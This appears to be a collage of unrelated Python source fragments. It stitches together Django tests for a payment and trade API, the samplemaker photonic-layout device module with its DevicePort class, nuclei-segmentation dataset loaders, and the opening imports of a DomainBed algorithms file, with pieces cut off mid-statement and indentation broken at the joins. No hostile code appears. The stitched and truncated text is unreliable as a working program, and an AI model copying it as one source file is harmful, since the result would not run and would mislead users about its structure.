        key_values['total_fee'] = api_trans.total_fee
        key_values['hy_bill_no'] = TEST_HY_BILL_NO
        key_values['trade_status'] = trade_status
        # Let's assume there's no from account for heepay
        #key_values['from_account'] = TEST_BUYER_ACCOUNT
        try:
            seller_account = UserPaymentMethod.objects.get(
                user__id=purchase_order.reference_order.user.id,
                provider__code = 'heepay')
        except UserPaymentMethod.DoesNotExist:
            self.fail('System cannot find the payment account of the seller that test trans {0} try to buy from'.format(api_trans.api_out_trade_no))
        except UserPaymentMethod.MultipleObjectsReturned:
            self.fail('System find more than one payment account of the seller that test trans {0} try to buy from'.format(api_trans.api_out_trade_no))
        key_values['to_account'] = seller_account.account_at_provider
        key_values['payment_time'] = payment_time
        output_data = jinja2_render('tradeex/apitests/data/heepay_confirm_template.j2', key_values)
        output_json = json.loads(output_data)
        logger.debug('create_heepay_confirm(): about to sign heepay confirmation')
        # Sign over the unsigned payload, then attach the signature.
        sign = sign_test_json(output_json, TEST_HY_KEY)
        output_json['sign'] = sign
        # TODO: this is to validate the sign
        #HeepayNotification.parseFromJson(output_json, api_trans.api_user.secretKey, False)
        return output_json
"""
def test_purchase_order_succeed_bad_payment_acct(self):
self.create_fitting_order(62)
# update the <EMAIL>'s heepay account into bad account, since this user's order
# is selected for the purchase, this update will failed the test.
updated = UserPaymentMethod.objects.filter(user__username='<EMAIL>').filter(provider__code='heepay').update(account_at_provider='bad_user_account')
self.assertTrue(updated, 'change <EMAIL>\'s heepay account should be successful')
request = TradeAPIRequest(
API_METHOD_PURCHASE,
TEST_API_USER1_APPKEY,
TEST_API_USER1_SECRET,
'order_match', # order id
None, # trx _id
62, # total fee
10, # expire_minute
'heepay', 'not_exist',
'127.0.0.1', #client ip
attach='userid:1',
subject='人民币充值测试-没有付款账号',
notify_url=TEST_NOTIFY_URL,
return_url='http://retururl')
c = Client()
request_str = request.getPayload()
print('send request {0}'.format(request_str))
response = c.post('/api/v1/applypurchase/', request_str,
content_type='application/json')
self.assertTrue(UserPaymentMethod.objects.filter(user__username='<EMAIL>').filter(provider__code='heepay').update(account_at_provider='18600701961'),
'recover <EMAIL>\'s heepay account should be successful')
print('response is {0}'.format(json.dumps(json.loads(response.content.decode('utf-8')), ensure_ascii=False)))
self.assertEqual(200, response.status_code)
resp_json = json.loads(response.content.decode('utf-8'))
self.assertEqual(resp_json['return_code'], 'FAIL')
self.assertEqual(resp_json['return_msg'], "收钱方账号不存在")
"""
# happy path for purchasing from 3rd party by using weixing (manual)
    def test_purchase_order_from_3rdParty_success_by_weixing(self):
        """Placeholder: the happy-path weixin purchase is exercised manually,
        so this test intentionally does nothing and always passes."""
        return True
# 3rd party purchase request fail when
def test_purchase_order_from_3rdParty_fail_by_missing_externalAddress(self):
# API_USER2 is from www.3rdparty.com, check tradeex/apitests/fixtures/fixture_test_tradeapi.json, "model": "tradeex.apiuseraccount".
request = TradeAPIRequest(
API_METHOD_PURCHASE,
TEST_API_USER2_APPKEY, TEST_API_USER2_SECRET,
"any_out_trade_no", # out_trade_no
total_fee=TEST_PURCHASE_AMOUNT, # total fee
expire_minute=10, # expire_minute
payment_provider='heepay',
payment_account='12738456',
client_ip='127.0.0.1', # client ip
attach='userid:1',
subject='人民币充值成功测试',
notify_url='http://testurl',
return_url='http://testurl',
# external_cny_rec_address = "xxxxx", missing this variable is the reason why it fails.
)
c = Client()
request_str = request.getPayload()
print('test_purchase_order_from_3rdParty_fail_by_missing_externalAddress(): send request {0}'.format(request_str))
response = c.post('/api/v1/applypurchase/', request_str,
content_type='application/json')
resp_json = json.loads(response.content.decode('utf-8'))
print('response is {0}'.format(json.dumps(resp_json, ensure_ascii=False)))
self.assertEqual('FAIL', resp_json['return_code'])
self.assertEqual('请提供相应的支付账号', resp_json['return_msg'])
@patch('tradeex.controllers.crypto_utils.CryptoUtility.unlock_wallet', side_effect=unlock_wallet_for_purchase_test)
@patch('tradeex.controllers.crypto_utils.CryptoUtility.send_fund', side_effect=send_fund_for_purchase_test)
@patch('trading.controller.heepaymanager.HeePayManager.send_buy_apply_request',
side_effect=send_buy_apply_request_side_effect)
@patch('tradeex.client.apiclient.APIClient.send_json_request', side_effect=send_json_request_for_purchase_test)
def test_purchase_order_succeed(self,send_json_request_function,
send_buy_apply_request_function,
send_fund_function,
unlock_wallet_function):
# create test | |
# -*- coding: utf-8 -*-
"""
This module contains the base classes for generating re-usable device classes.
The Device class
----------------
The `Device` class is an interface to generate specific devices.
In `samplemaker` a device is the combination of drawing commands that generate
a specific pattern which is typically re-used in different layouts.
The devices are parametric, in the sense that the pattern can be a function of
external parameters.
For example, a cross mark device can be a function of the mark size, the width of
cross arms, etc.
The `Device` class provides a common interface to define parameters and drawing
functions. To create a new device, simply derive the `Device` class and provide
an implementation for parameters and geometry:
    class MyFancyDevice(Device):
def initialize(self):
# Initialization stuff goes here
pass
def parameters(self):
# Parameters are defined here
pass
def geom(self):
# Drawing goes here
pass
def ports(self):
# Ports go here
pass
# To use:
dev = MyFancyDevice.build()
geom = dev.run()
As bare minimum, the initialize, parameters and geom methods should be re-implemented in a
device class.
### Device name
When initializing the device it is very important to give it a unique name as a string
(and optionally a description).
This is done in the `Device.initialize` method:
def initialize(self):
self.set_name("MYDEVICE")
self.set_decription("First version of MYDEVICE")
The name is used to call devices later on (see Device registration below) and
to instantiate them in circuits.
### Parameters
Device paramters must be defined via the function `Device.add_parameter` as follows:
def parameters(self):
self.add_parameter("my_param", default_value, "Description", type, (min, max))
The default value is usually hard-coded into the device itself and should be the
reference value for creating the geometry. Optionally, the parameter type can be specified
as `bool` or `int` or `float`. The use of string is not recommended but it is not
forbidden. Also optionally, a range can be specified for integer and float values as a tuple.
This helps the user of the device in figuring out what makes sense. For example:
def parameters(self):
        self.add_parameter("length", 15, "Length of the marker", float, (2, 30))
To use one of the parameter in the drawing, use the `Device.get_params` function
to get a dictionary of the parameters with values:
def geom(self):
p = self.get_params()
L = p["length"] # Marker length
### Drawing the geometry
The `Device.geom` method should be implemented so that it returns a `samplemaker.shapes.GeomGroup`
object with the geometry.
The user should never run the `Device.geom` method, but use instead `Device.run` (see example above).
### Building, running, what is all that?
A device object is never instantiated via its constructor __init__ but using
the class method `Device.build`.
Building a device is like initializing it, setting the default parameters and preparing the device
to be drawn.
To actually draw the geometry you use the `Device.run` method, which ensures that
the exact sequence of operation is carried out.
### Device registration
To re-use the devices later on, it is common practice to build a library of
devices (containing all the classes) and register the devices to a shared dictionary
that other functions can use to build/run named devices.
This is achieved via the `registerDevicesInModule` which can be called at the end
of each python script and will update a hidden device database.
Building a device is then simply done as
dev = Device.build_registered("MYDEVICE")
geom = dev.run()
See example
Device Ports
------------
An important part of device creation is to define ports that can connect a device
to another one.
To define ports, `samplemaker` provides the base class `DevicePort`.
The class defines a named port, with position and orientation.
The device ports are specified by re-implementing the `Device.ports` function and
calling the `Device.addport` method:
def ports(self):
p1 = DevicePort(20,40,True,True)
self.addport("port1", p1)
The above code generates a `DevicePort` placed at (20,40) facing east.
The two boolean define whether the port is oriented horizontally or vertically
and if it faces forward or backward.
Check the documentation of `DevicePort` to learn more about port properties.
Quite often, when creating ports, it is necessary to use some variable which is
only defined locally in the geom() function.
To define ports directly from geom(), one can use the method `Device.addlocalport`
instead and leave the ports() methods not implemented:
def geom(self):
p1 = DevicePort(20,40,True,True)
self.addlocalport("port1", p1)
Do not use `Device.addport` from the geom() command as it will not work.
### Implementing custom device ports
Users can define different port types by inheriting the `DevicePort` class.
For example one might be interested in defining optical ports (for waveguide devices)
and electrical ports (for electronic circuits).
The default DevicePort in fact cannot be connected to anything until the user
supplies a connector function.
For example
def OpticalPortConnector(port1: "DevicePort",port2: "DevicePort") -> "GeomGroup":
# functions that calculate and draw the connector
return geom
class OpticalPort(DevicePort):
def __init__(self,x0,y0,horizontal,forward,width,name):
super().__init__(x0,y0,horizontal,forward)
self.width = width
self.name=name
self.connector_function=OpticalPortConnector
The newly created OpticalPort can now be connected to other OpticalPort ports.
Circuits
---------
Once ports are specified, it is possible to create circuits that connect various
devices with each others.
A circuit is itself a `Device` with parameters and ports, except the drawing routine is
controlled by a netlist that defines what devices should be instantiated, where,
and how connectivity is defined.
### Defining a netlist
The `NetList` class specifies a circuit layout. To specify a Netlist, you need to
provide a list of entries via the class `NetListEntry`.
A single entry of the netlist correspond to a device name (which should be registered)
position, and connectivity:
entry1 = NetListEntry("MYDEVICE", 0, 0, "E", {"port1":"inA","port2":"inB"}, {"length":16})
In the above example MYDEVICE will be placed in 0,0 facing East ("E") and its parameter "length" will be set to 16.
Additionally the named DevicePort "port1" has been assigned to wire "inA" and "port2" to wire "inB".
The circuit builder will look for any other entry where a port has been assigned to wire "inA" and run
the connector (provided by user) between the two ports.
If a matching port cannot be found, the wire will become the name of an external port of the entire circuit.
The netlist is then built specifying the list of entries and a circuit can be built exactly as a
standard device:
netlist = NetList("my_circuit", [entry1,entry2,entry3])
cir_dev = Circuit.build() # Note that we build first
cir_dev.set_param("NETLIST") = netlist # Set the NETLIST parameter
g = cir_dev.run() # and finally run the device
More details on specifying circuits are given in the tutorials, where it is also
explained how to nest circuits together (i.e. creating netlists of netlists)
"""
import math
import sys,inspect
import numpy as np
from copy import deepcopy
from samplemaker.shapes import GeomGroup, Poly
from samplemaker.makers import make_sref, make_text
from samplemaker import LayoutPool, _DeviceCountPool, _DeviceLocalParamPool, _DevicePool, _BoundingBoxPool
from samplemaker.gdswriter import GDSWriter
from samplemaker.gdsreader import GDSReader
class DevicePort:
    """A connection point on a `Device`.

    A port has a position (x0, y0) and a discrete orientation encoded by two
    booleans: `hv` (True = along the horizontal axis) and `bf` (True =
    forward, i.e. towards +x or +y). The four combinations map to the
    compass directions E/W/N/S. Ports can be moved with turtle-style
    commands (`S`, `BL`, `BR`, `rotate`) and restored to a saved pose via
    `fix`/`reset`.
    """

    def __init__(self, x0, y0, horizontal, forward):
        """Create a port at (x0, y0) with the given orientation flags."""
        self.x0 = x0
        self.y0 = y0
        # Saved pose used by fix()/reset().
        self.__px = x0
        self.__py = y0
        self.hv = horizontal
        self.bf = forward
        self.__hv = horizontal
        self.__bf = forward
        self.name = ""
        # Full geometry this port is attached to, and any sibling ports
        # shared with it in the same device.
        self._geometry = GeomGroup()
        self._parentports = dict()
        # Callable(port1, port2) -> GeomGroup drawing the connection; must
        # be supplied (e.g. by a subclass) before the port can be connected.
        self.connector_function = None

    def set_name(self, name):
        """Assign the port name."""
        self.name = name

    def angle(self):
        """Return the direction in radians: E=0, N=pi/2, W=pi, S=3*pi/2."""
        return math.pi * (3 - (self.hv + self.bf * 2)) / 2

    def set_angle(self, angle):
        """Set the orientation flags from *angle* (snapped to a quadrant)."""
        quadrant = round(3 - angle * 2 / math.pi) % 4
        self.hv = quadrant % 2 == 1
        self.bf = math.floor(quadrant / 2) == 1

    def printangle(self):
        """Print the compass letter of the current direction."""
        print(self.angle_to_text())

    def angle_to_text(self):
        """Return the compass letter ("E", "W", "N" or "S")."""
        if self.hv:
            return "E" if self.bf else "W"
        return "N" if self.bf else "S"

    def dx(self):
        """Unit step along x for the current direction (-1, 0 or 1)."""
        return (2 * self.bf - 1) if self.hv else 0

    def dy(self):
        """Unit step along y for the current direction (-1, 0 or 1)."""
        return 0 if self.hv else (2 * self.bf - 1)

    def rotate(self, x0, y0, angle):
        """Rotate the port by *angle* degrees around the pivot (x0, y0)."""
        rel_x = self.x0 - x0
        rel_y = self.y0 - y0
        cos_t = math.cos(math.radians(angle))
        sin_t = math.sin(math.radians(angle))
        self.x0 = cos_t * rel_x - sin_t * rel_y + x0
        self.y0 = sin_t * rel_x + cos_t * rel_y + y0
        self.set_angle(self.angle() + math.radians(angle))

    def S(self, amount):
        """Go straight: advance *amount* along the current direction."""
        self.x0 += self.dx() * amount
        self.y0 += self.dy() * amount

    def BL(self, radius):
        """Bend left along a quarter arc of the given *radius*."""
        center_x = self.x0 - self.dy() * radius
        center_y = self.y0 + self.dx() * radius
        phi = self.angle() - math.pi / 2
        self.x0 = radius * math.cos(phi + math.pi / 2) + center_x
        self.y0 = radius * math.sin(phi + math.pi / 2) + center_y
        self.set_angle(self.angle() + math.pi / 2)

    def BR(self, radius):
        """Bend right along a quarter arc of the given *radius*."""
        center_x = self.x0 + self.dy() * radius
        center_y = self.y0 - self.dx() * radius
        phi = self.angle() + math.pi / 2
        self.x0 = radius * math.cos(phi - math.pi / 2) + center_x
        self.y0 = radius * math.sin(phi - math.pi / 2) + center_y
        self.set_angle(self.angle() - math.pi / 2)

    def reset(self):
        """Restore the pose saved at construction or by the last fix()."""
        self.x0 = self.__px
        self.y0 = self.__py
        self.hv = self.__hv
        self.bf = self.__bf

    def fix(self):
        """Save the current pose as the one reset() will return to."""
        self.__px = self.x0
        self.__py = self.y0
        self.__hv = self.hv
        self.__bf = self.bf

    def dist(self, other):
        """Euclidean distance from this port to *other*."""
        delta_x = other.x0 - self.x0
        delta_y = other.y0 - self.y0
        return math.sqrt(delta_x * delta_x + delta_y * delta_y)
class Device:
def __init__(self):
"""
Initializes a Device. Should never be called.
Returns
-------
None.
"""
self._p = | |
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
sys.path.append(r'D:\DeepLearning\Kaggle\Datahandling')
import utils_for_datasets
import glob
import numpy as np
import cv2
import re
import os.path
import scipy
import time
from skimage.measure import label
import skimage.transform as ski_transform
import matplotlib.pyplot as plt
# Dataset root folders (Windows paths). bugfix: these were plain strings
# containing invalid escape sequences such as "\C" and "\D", which only work
# because they are not recognized escapes (and raise SyntaxWarning on modern
# Python). Raw strings produce byte-identical values.
DATASETROOT = r'CVSP\Cameratrap'
DATASETROOT_CVL = r'CVSP\CVL'
UNETROOT = r'D:\DeepLearning\Semantic_segmentation\Cameratrap_Dataset'
UNETROOT_CVL = r'D:\DeepLearning\Semantic_segmentation\CVL_Dataset'
DATASET_FOLDER_TISQUANT = r'D:\DeepLearning\SCCHCode\TisQuantValidation\data'
#DATASET_FOLDER_KAGGLE = r'D:\\DeepLearning\\SCCHCode\\data\\kaggle-dsbowl-2018-dataset-fixes-master\\stage1_train'
#DATASET_FOLDER_KAGGLE = r'D:\\DeepLearning\\SCCHCode\\data\\Kaggle\\stage1_train'
from scipy.io import loadmat, savemat
from tifffile import tifffile
from Config.Config import UNETSettings
from tqdm import tqdm
class TisquantDataset(utils_for_datasets.Dataset):
    """Dataset over the pre-sliced 256x256 TisQuant evaluation .mat files.

    Grayscale raw images and instance-labelled ground-truth masks are loaded
    from MATLAB files under DATASET_FOLDER_TISQUANT and exposed through the
    utils_for_datasets.Dataset API.
    """
    def load_data(self,width=None,height=None,ids=None,mode=1):
        """Load images and masks from the .mat file and register them.

        :param width: image width stored in each registered image's metadata
        :param height: image height stored in each registered image's metadata
        :param ids: unused; the returned ids are generated here
        :param mode: 1 loads the training set (ids shuffled in place),
            anything else loads the test set (ids kept in order)
        :returns: numpy array of image indices
        """
        self.add_class("Nuclei",1,'Nucleus')
        # mode selects which .mat file (and which struct inside it) to read.
        if (mode==1):
            data_file = "256x256_TisQuantTrainingData_Evaluation1_new.mat"
        else:
            data_file = "256x256_TisQuantTestData_Evaluation1_new.mat"
        print('... LOADING DATA')
        Images, Labels, FileNames = [], [], []
        raw_data = loadmat(os.path.join(DATASET_FOLDER_TISQUANT, data_file), struct_as_record=True)
        if (mode==1):
            raw_data = raw_data['trainingset']
        else:
            raw_data = raw_data['testset']
        Images, Masks = [], []
        slice_size = 256
        masks = raw_data['groundtruth'][0]
        raw_images = raw_data['rawimage'][0]
        n_images = len(raw_images)
        # Collect raw (unnormalized) images and their labelled masks; the
        # commented-out variants show previously tried preprocessing steps.
        for i,img in enumerate(raw_images):
            #img_new = np.zeros((3, img.shape[0], img.shape[1]))
            #img_new[0] = img
            #img_new[1] = img
            #img_new[2] = img
            #Images.append(img_new / 255.0)
            #Images.append(img / 255.0)
            #Images.append(img / 255.0)
            Images.append(img)
            #Masks.append(label(masks[i]>0))
            Masks.append(masks[i])
        # convert to conv net format
        img_size = Images[0].shape
        #Images = np.asarray(Images, dtype=np.float32).reshape(-1, img_size[0], img_size[1],img_size[2])
        #Images = np.transpose(Images, (0, 2, 3, 1))
        Images = np.asarray(Images, dtype=np.float32).reshape(-1, img_size[0], img_size[1])
        #Masks = np.asarray(Masks, dtype=np.float32).reshape(-1, 1, img_size[1], img_size[2])
        #Masks = np.transpose(Masks, (0, 2, 3, 1))
        Masks = np.asarray(Masks, dtype=np.float32).reshape(-1, img_size[0], img_size[1])
        # NOTE(review): train_val, ret_val, n_tr and slice_size are computed
        # but never used; only train_cnt below is kept.
        train_val = 0.8
        ret_val = 0
        n_tr = int(round(Images.shape[0] * 0.8))
        ids = np.arange(Images.__len__())
        if (mode == 1): # Trainingset
            np.random.shuffle(ids)
        self.images = Images
        self.masks = Masks
        for i in range(self.images.shape[0]):
            self.add_image("Nuclei", image_id=i, path=None,width=width, height=height)
        # 80/20 train/validation split point over the registered images.
        self.train_cnt = int(self.images.__len__()*0.8)
        #self.images = np.transpose(self.images,(0,3,1,2))
        #self.masks = np.transpose(self.masks,(0,3,1,2))
        return ids
    def getMeanMaskObjectSize(self, image_id):
        """Return the mean pixel area per mask instance, or 0 when undefined."""
        masks = self.load_mask(image_id)
        # Drop the background layer (index 0) before averaging.
        masks_new = masks[0][:, :, 1:]
        print("Summe: {0}, Laenge: {1}".format(masks_new.sum(), masks_new.shape[2]))
        if (np.isnan(masks_new.sum() / masks_new.shape[2])):
            return 0
        else:
            return int(masks_new.sum() / masks_new.shape[2])
    def load_image(self, image_id):
        """Return the raw image array for *image_id*."""
        return self.images[image_id]
    def image_reference(self, image_id):
        """Return the shapes data of the image."""
        info = self.image_info[image_id]
        if info["source"] == "shapes":
            return info["shapes"]
        else:
            # NOTE(review): super(self.__class__).image_reference(self, ...)
            # is an unusual unbound-super call - verify it behaves as intended.
            super(self.__class__).image_reference(self, image_id)
    def load_mask(self, image_id):
        """Generate instance masks for shapes of the given image ID.

        Returns (H x W x (count+1) stack, class_ids); layer 0 is background
        (class id 0), layers 1..count are per-instance masks (class id 1).
        """
        info = self.image_info[image_id]
        mask = self.masks[image_id]
        # The labelled mask stores instance index per pixel; max = instance count.
        count = int(mask.max())
        mask_new = np.zeros([info['height'], info['width'], count+1], dtype=np.uint8) # one more for background
        for i in range(count+1):
            #mask_new[:, :, i:i+1] = (mask == i).transpose(1, 2, 0)
            mask_new[:, :, i:i + 1] = (mask==i).reshape(mask.shape[0], mask.shape[1], -1)
            # mask_new[:, :, i:i+1] = (mask==i).transpose(1,2,0)
        # Map class names to class IDs.
        class_ids = np.ones(count+1) # one more for background
        #add Background
        #class_ids[count] = 0 # add Background
        #mask_new[:, :, count:count + 1] = (mask == 0).transpose(1, 2, 0)
        #class_ids[count] = 0 # add Background
        class_ids[0] = 0 # add Background
        # End add Background
        return mask_new, class_ids.astype(np.int32)
    def load_mask_one_layer(self,image_id):
        """Return the single-layer labelled mask (instance index per pixel)."""
        return self.masks[image_id]#[0]
class KaggleDataset(utils_for_datasets.Dataset):
    """Dataset over a Kaggle DSB2018-style folder layout.

    Each sample folder contains an `images/` directory with one PNG and a
    `masks/` directory holding one binary PNG per nucleus instance.
    """
    def load_data(self,width=None,height=None,ids=None,mode=1,folders=None):
        """Index image/mask paths under *folders* and register the images.

        :param folders: root directory containing one sub-folder per sample
        :returns: deterministically shuffled (seed 1) array of image ids
        """
        self.image_path = []
        self.mask_path = []
        self.add_class("Nucleus",1,'Nucleus')
        self.setImagePaths(folders)
        ids = np.arange(len(self.image_path))
        np.random.seed(1)  # fixed seed so the shuffle is reproducible across runs
        np.random.shuffle(ids)
        self.ids = ids
        for i in self.ids:
            self.add_image("Nucleus", image_id=i, path=None)
        return ids
    def load_image(self, image_id):
        """Read and return the BGR image for *image_id* (as stored by cv2)."""
        info = self.image_info[image_id]
        img = cv2.imread(self.image_path[self.ids[image_id]])
        #img = ski_transform.resize(img, (info['height'], info['width']), mode='reflect')
        return img
    def setImagePaths(self,folders=""):
        """Collect the image PNG and masks directory of every sample folder."""
        for folder in os.listdir(folders):
            file_pattern = os.path.join(folders,folder,'images',"*.png")
            img_files = glob.glob(file_pattern)
            for i in img_files:
                self.image_path.append(i)
                self.mask_path.append(os.path.join(folders,folder,'masks'))
    def image_reference(self, image_id):
        """Return the shapes data of the image."""
        info = self.image_info[image_id]
        if info["source"] == "shapes":
            return info["shapes"]
        else:
            # NOTE(review): super(self.__class__).image_reference(self, ...)
            # is an unusual unbound-super call - verify it behaves as intended.
            super(self.__class__).image_reference(self, image_id)
    def load_mask(self, image_id):
        """Generate instance masks for shapes of the given image ID.

        Returns (H x W x (n_masks+1) stack, class_ids); layer 0 is the
        background (class id 0), the remaining layers hold one instance each.
        """
        mask_path = self.mask_path[self.ids[image_id]]
        file_pattern = os.path.join(mask_path, "*.png")
        info = self.image_info[image_id]
        mask_files = glob.glob(file_pattern)
        mask_new = np.zeros([info['height'], info['width'], len(mask_files)+1], dtype=np.uint8) # one more for background
        count = 1
        mask_total = 0
        for i in mask_files:
            mask = cv2.imread(i)
            mask = mask[:, :, 1] / 255.0
            #mask = ski_transform.resize(mask, (info['height'], info['width']), mode='reflect')
            mask_new[:, :, count] = (mask)
            mask_total = mask_total + (mask>0) * count
            count = count + 1
        # Map class names to class IDs; index 0 is the background class.
        class_ids = np.ones(count)
        class_ids[0] = 0  # background
        # bugfix: np.bool was removed in NumPy 1.24; use the builtin bool dtype.
        mask_new[:, :, 0] = np.invert(mask_total.astype(bool))
        return mask_new, class_ids.astype(np.int32)
    def load_mask_one_layer(self, image_id):
        """Return a single-layer mask with the instance index per pixel.

        Later masks overwrite earlier ones where instances overlap.
        """
        mask_path = self.mask_path[self.ids[image_id]]
        file_pattern = os.path.join(mask_path, "*.png")
        info = self.image_info[image_id]
        mask_files = glob.glob(file_pattern)
        mask_new = np.zeros([info['width'], info['height'], len(mask_files)+1], dtype=np.uint8) # one more for background
        count = 1
        mask_total = 0
        for i in mask_files:
            mask = cv2.imread(i)
            mask = mask[:, :, 1] / 255.0
            #mask = ski_transform.resize(mask, (info['height'], info['width']), mode='reflect')
            mask_new[:, :, count] = (mask)
            # Clear previously assigned labels where this mask is set, then label.
            mask_total = mask_total * (mask == 0)
            mask_total = mask_total + (mask>0) * count
            count = count + 1
        return mask_total
    def getMeanMaskObjectSize(self, image_id):
        """Return the mean pixel area over all instance masks as int16."""
        mask_path = self.mask_path[self.ids[image_id]]
        file_pattern = os.path.join(mask_path, "*.png")
        mask_files = glob.glob(file_pattern)
        total_sum = 0
        for i in mask_files:
            mask = cv2.imread(i)
            total_sum = total_sum + (mask>0).sum()
        return (total_sum / len(mask_files)).astype(np.int16)
    def pre_process_img(self,img, color):
        """Convert *img* to the requested color space and scale to [0, 1] float32.

        :param color: 'gray', 'rgb', or anything else to keep the channels as read
        """
        # bugfix: was `if color is 'gray'` - identity comparison against a
        # string literal, which only works by interning accident and raises
        # SyntaxWarning on Python >= 3.8.
        if color == 'gray':
            img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        elif color == 'rgb':
            img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        img = img.astype(np.float32)
        img /= 255.0
        return img
class ArtificialNucleiDataset(utils_for_datasets.Dataset):
img_prefix = 'Img_'
img_postfix = '-outputs.png'
mask_prefix = 'Mask_'
mask_postfix = '.tif'
settings = UNETSettings()
    def load_data(self, width=256, height=256, ids=None, mode=1):
        """Populate image/mask path lists and image metadata from the
        directories configured in UNETSettings.

        In 'train' mode the train and val directory lists are loaded in
        sequence, each index range is shuffled separately, and self.ids holds
        the concatenation [shuffled train ids, shuffled val ids]. Otherwise
        the test directories are loaded with sequential ids.

        NOTE(review): directory suffixes use Windows separators ("\\images",
        "\\masks") — confirm this is only run on Windows. The function
        returns the *caller-supplied* `ids` argument unchanged, not the ids
        it computed; `mode` is unused.
        """
        # Load settings
        self.image_path = []
        self.mask_path = []
        self.add_class("ArtificialNuclei", 1, 'ArtificialNuclei')
        train_cnt = 0
        val_cnt = 0
        print("Loading train data ...")
        if self.settings.network_info["traintestmode"] == 'train':
            # Train split: semicolon-separated directory list.
            for i in self.settings.network_info["dataset_dirs_train"].split(';'):
                img_range = self.setImagePaths(folders=[i + "\\images"])
                self.setMaskPaths(folders=[i + "\\masks"],img_range=img_range)
            print("Checking train path ...")
            self.checkPath()
            print("Loading val data ...")
            train_cnt = self.image_path.__len__()
            for i in self.settings.network_info["dataset_dirs_val"].split(';'):
                img_range = self.setImagePaths(folders=[i + "\\images"])
                self.setMaskPaths(folders=[i + "\\masks"],img_range=img_range)
            print("Checking val path ...")
            self.checkPath()
            val_cnt += self.image_path.__len__() - train_cnt
            #ids = np.arange(self.image_path.__len__())
            # Shuffle train and val index ranges independently so the splits
            # stay disjoint.
            ids_train = np.arange(0,train_cnt)
            ids_val = np.arange(train_cnt, train_cnt+val_cnt)
            self.train_cnt = train_cnt
            self.val_cnt = val_cnt
            np.random.shuffle(ids_train)
            np.random.shuffle(ids_val)
            self.ids = np.concatenate((ids_train,ids_val),axis=0)
        else:
            # Test / inference mode: sequential, unshuffled ids.
            for i in self.settings.network_info["dataset_dirs_test"].split(';'):
                img_range = self.setImagePaths(folders=[i + "\\images"])
                self.setMaskPaths(folders=[i + "\\masks"],img_range=img_range)
            print("Checking train path ...")
            self.checkPath()
            self.ids = np.arange(0,self.image_path.__len__())
        # Register one image record per id for the Dataset base class.
        for i in self.ids:
            self.add_image("ArtificialNuclei", image_id=i, path=None, width=width, height=height)
        return ids
def checkPath(self):
to_delete = []
for index,i in tqdm(enumerate(self.image_path)):
if not os.path.exists(i):
to_delete.append(index)
to_delete.sort(reverse=True)
for i in to_delete:
del self.image_path[i]
del self.mask_path[i]
def load_image(self, image_id):
info = self.image_info[image_id]
img_final = cv2.imread(self.image_path[self.ids[image_id]])
try:
img_final = img_final[:,:,0]
except:
None
#return img_final / 255.0
if self.settings.network_info["netinfo"] == 'maskrcnn': # mask rcnn need an rgb image
img_new = np.zeros((img_final.shape[0],img_final.shape[1],3))
img_new[:,:,0] = img_new[:,:,1] = img_new[:,:,2] = img_final
img_final = img_new
return img_final
def setImagePaths(self, folders=""):
for folder in folders:
file_pattern = os.path.join(folder, self.img_prefix + "*" + self.img_postfix) #"Img_*-outputs.png")
print(file_pattern)
img_files = glob.glob(file_pattern)
img_files.sort()
img_range = range(0,img_files.__len__())
for i in img_range:
#self.image_path.append(os.path.join(folder, "Img_" + str(i) + "-outputs.png"))
self.image_path.append(os.path.join(folder, self.img_prefix + str(i) + self.img_postfix))
# for i in img_files:
# self.image_path.append(i)
return img_range
def setMaskPaths(self, folders="",img_range=None):
for folder in folders:
file_pattern = os.path.join(folder, self.mask_prefix + "*" + self.mask_postfix) #"Mask_*.tif")
print(file_pattern)
img_files = glob.glob(file_pattern)
img_files.sort()
#for i in range(0,img_files.__len__()):
for i in img_range:
self.mask_path.append(os.path.join(folder, self.mask_prefix + str(i) + self.mask_postfix))
#self.mask_path.append(os.path.join(folder, "Mask_" + str(i) + ".tif"))
def image_reference(self, image_id):
"""Return the shapes data of the image."""
info = self.image_info[image_id]
if info["source"] == "shapes":
return info["shapes"]
else:
super(self.__class__).image_reference(self, image_id)
def load_mask(self, image_id):
"""Generate instance masks for shapes of the given image ID.
"""
info = self.image_info[image_id]
mask = tifffile.imread(self.mask_path[self.ids[image_id]])
if np.unique(mask).__len__() > 1:
count = np.unique(mask).__len__()-1 # one less because of 0
mask_new = np.zeros([info['height'], info['width'], count], dtype=np.uint8) # one more for background
running = 0
for i in np.unique(mask): #range(1, count):
if ((i > 0) & ((mask == i).sum() > 0)):
mask_new[:, :, running] = (mask == i)
running = running + 1
# Map class names to class IDs.
class_ids = np.ones(count)
else:
mask_new = np.zeros([info['height'], info['width'], 1], dtype=np.uint8)
class_ids = np.zeros([1])
return mask_new, class_ids.astype(np.int32)
def load_mask_one_layer(self, image_id,relabel=False):
mask = tifffile.imread(self.mask_path[self.ids[image_id]])
if (mask.ndim > 2):
mask = mask[:,:,0]
if (relabel):
mask_tmp = np.zeros((mask.shape[0],mask.shape[1]))
running=1
for i in np.unique(mask):
if i > 0:
mask_tmp = mask_tmp + running * (mask==i)
running = running + 1
mask = mask_tmp.astype(np.float)
return mask #mask.astype(np.float)
def pre_process_img(self, img, color):
"""
Preprocess image
"""
if color is 'gray':
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
elif color is 'rgb':
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
else:
pass
img = img.astype(np.float32)
img /= 255.0
return img
def split_train_test(self,width=256, height=256):
dataset_train = ArtificialNucleiDataset()
dataset_test = ArtificialNucleiDataset()
dataset_train.image_path = []
dataset_train.mask_path = | |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from backpack import extensions
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.autograd as autograd
from torch.autograd import Variable
import random
from statistics import mean
import math
import copy
import numpy as np
from collections import defaultdict, OrderedDict
import itertools
from domainbed import networks
from domainbed.lib import misc, diversity_metrics, diversity, torchutils, sam, sammav
from domainbed.lib.lff import EMA, GeneralizedCELoss
# torchmetrics is an optional dependency; precision/recall reporting is simply
# disabled when it is not installed.
try:
    from torchmetrics import Precision, Recall
except ImportError:
    # Narrowed from a bare `except:` so that unrelated errors (KeyboardInterrupt,
    # broken installs raising other exceptions) are not silently swallowed.
    Precision, Recall = None, None
from backpack import backpack, extend
from backpack.extensions import BatchGrad
# Registry of selectable algorithm names; each entry must match a class in this
# module's global namespace (resolved by get_algorithm_class). Commented-out
# entries are implemented upstream but disabled in this build.
ALGORITHMS = [
    "ERM",
    "Fish",
    "IRM",
    # "IRMAdv",
